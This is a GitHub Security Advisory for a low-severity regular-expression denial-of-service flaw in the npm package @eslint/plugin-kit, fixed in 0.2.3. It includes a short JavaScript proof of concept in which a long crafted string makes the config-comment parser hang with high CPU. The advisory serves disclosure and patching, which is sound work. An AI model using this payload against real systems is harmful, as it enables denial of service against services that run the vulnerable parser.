GHSA-7q7g-4xm8-89cq
GitHub Security Advisory
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
✓ GitHub Reviewed
LOW
Has CVE
Advisory Details
Crafting a very large and well crafted string can increase the CPU usage and crash the program.
## POC
```js
const { ConfigCommentParser } = require("@eslint/plugin-kit");
var str = "";
for (var i = 0; i < 1000000; i++) {
str += " ";
}
str += "A";
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")
// run `npm i @eslint/plugin-kit` and `node attack.js`
// then the program will stuck forever with high CPU usage
```
Affected Packages
npm
@eslint/plugin-kit
Affected versions:
0
(fixed in 0.2.3)
Related CVEs
Key Information
2.5
/10
Dataset
Last updated: July 30, 2025 6:36 AM
Data from GitHub Advisory Database. This information is provided for research and educational purposes.